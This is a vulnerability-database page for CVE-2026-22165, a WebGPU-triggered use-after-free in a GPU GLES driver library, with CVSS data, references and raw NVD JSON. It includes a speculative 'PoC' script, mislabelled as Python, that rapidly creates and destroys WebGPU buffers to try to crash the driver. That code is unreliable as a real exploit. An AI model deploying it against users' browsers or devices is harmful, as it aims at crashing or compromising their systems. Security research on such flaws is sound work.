CVE-2026-22165

Description

A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger a write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable further exploits on the device.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

版本信息未明确公开

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
  PoC Concept for CVE-2026-22165
  This script attempts to stress the GPU GLES shared library
  by creating and destroying WebGPU buffers rapidly.
-->
<script>
async function triggerUAF() {
  if (!navigator.gpu) {
    console.log("WebGPU not supported on this browser.");
    return;
  }

  try {
    const adapter = await navigator.gpu.requestAdapter();
    const device = await adapter.requestDevice();
    
    // Loop to create memory pressure and potential UAF condition
    for (let i = 0; i < 10000; i++) {
      const buffer = device.createBuffer({
        size: 1024,
        usage: GPUBufferUsage.COPY_DST | GPUBufferUsage.MAP_WRITE,
        mappedAtCreation: true
      });
      
      // Simulate unusual content interaction
      new Uint8Array(buffer.getMappedRange()).fill(i);
      buffer.unmap();
      
      // Rapid destruction to potentially trigger use-after-free in driver
      buffer.destroy();
    }
    console.log("WebGPU execution completed.");
  } catch (error) {
    console.error("Error triggering vulnerability:", error);
  }
}

triggerUAF();
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22165
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22165
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22165/
[4] VulDB https://vuldb.com/cve/CVE-2026-22165
[5] https://www.imaginationtech.com/gpu-driver-vulnerabilities/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22165", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-05-01T16:16:29.437", "lastModified": "2026-05-06T19:05:56.337", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger a write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable further exploits on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce"}]}}